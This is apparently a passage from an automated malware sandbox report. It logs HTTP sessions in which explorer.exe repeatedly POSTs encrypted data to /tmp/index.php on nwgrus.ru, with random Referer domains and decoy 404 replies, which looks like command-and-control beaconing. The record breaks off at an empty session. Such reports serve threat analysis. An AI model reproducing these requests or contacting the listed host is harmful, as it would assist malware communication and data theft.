                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      19192.168.2.44975578.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:45.129367113 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://sdipfhxrqta.net/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 147
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:45.129425049 CEST147OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 5c 3f af e2
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vu\?%Xzp`:[RHo3LvF65LP2$wm
                                                                                      Oct 1, 2024 15:17:46.344868898 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:46 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      20192.168.2.44975678.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:46.352650881 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://ecqgmfmehrdfesh.net/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 276
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:46.352679968 CEST276OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 6c 20 db e9
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vul DEmhc]FYTy"rI'.^lS=;O8PTlh2?i0pV?ZiK<pD>3KvY@GfL"a|xfkT%-&
                                                                                      Oct 1, 2024 15:17:47.480715036 CEST137INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:47 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      21192.168.2.44975778.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:47.488466978 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://cmyvyfvgexcutc.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 362
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:47.488495111 CEST362OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 4a 54 fb e2
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vuJTw6iLGWF]b%E>dt+MIh[ XvW#$m[DZFr+`h%+3-4evPJ=giWVPh
                                                                                      Oct 1, 2024 15:17:48.777230024 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:48 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      22192.168.2.44975878.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:48.785304070 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://gahrsvlvghgft.com/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 336
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:48.785329103 CEST336OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 28 0b ee eb
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vu(gMf\p?{VqiKUgCH55BP8 'oQS"1%4`$0>jN$1q(mB:|u}1GCRi
                                                                                      Oct 1, 2024 15:17:49.901345015 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:49 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      23192.168.2.44975978.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:49.909883022 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://dikpavspdxtej.net/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 171
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:49.909920931 CEST171OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 2d 45 ef fd
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vu-E?PlYj+jP$,u0?Lh|?B A#s{p U*1YK&j
                                                                                      Oct 1, 2024 15:17:50.981254101 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:50 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      24192.168.2.44976078.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:50.997971058 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://arbcgjbfbud.net/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 237
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:50.998014927 CEST237OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 50 02 ff b8
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vuP{[Xv6p4z)FJS]SpB@+bD#+ DD~5_kI:^@^+,9B^00Y"Y{
                                                                                      Oct 1, 2024 15:17:52.350409031 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:52 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      25192.168.2.44976178.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:52.366202116 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://dhkilweanmi.com/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 318
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:52.366219044 CEST318OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 6c 29 b3 a0
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vul)DQ{G`6nU&l:X/B^K]?KvO)jQ_=<6Qv(?@DA.w@Hyp`R%Q
                                                                                      Oct 1, 2024 15:17:53.596154928 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:53 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      26192.168.2.44976378.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:18:58.635438919 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://rvuyclbvwkrg.com/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 240
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:18:58.635438919 CEST240OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5b 46 b7 f5
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vu[FDLcoB0)VVCdBW90N?SW-l>Bw\cIdI55c1;P;iXm :`df#
                                                                                      Oct 1, 2024 15:18:59.724081039 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:18:59 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      27192.168.2.44976478.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:19:04.972449064 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://jqtjcxypgpwnw.net/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 126
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:19:04.972641945 CEST126OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 4f e4 b8
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vuUOWAT|BoQ[hM8e
                                                                                      Oct 1, 2024 15:19:06.035068989 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:19:05 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      28192.168.2.44976578.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:19:10.695298910 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://bcgwrufdvmvybh.com/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 200
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:19:10.695326090 CEST200OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5b 3b cd ea
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vu[;SwmIYtqOIY*?_I5rSUUJR7VJn]=o-N4~EZh T
                                                                                      Oct 1, 2024 15:19:11.806364059 CEST151INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:19:11 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      29192.168.2.44976678.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
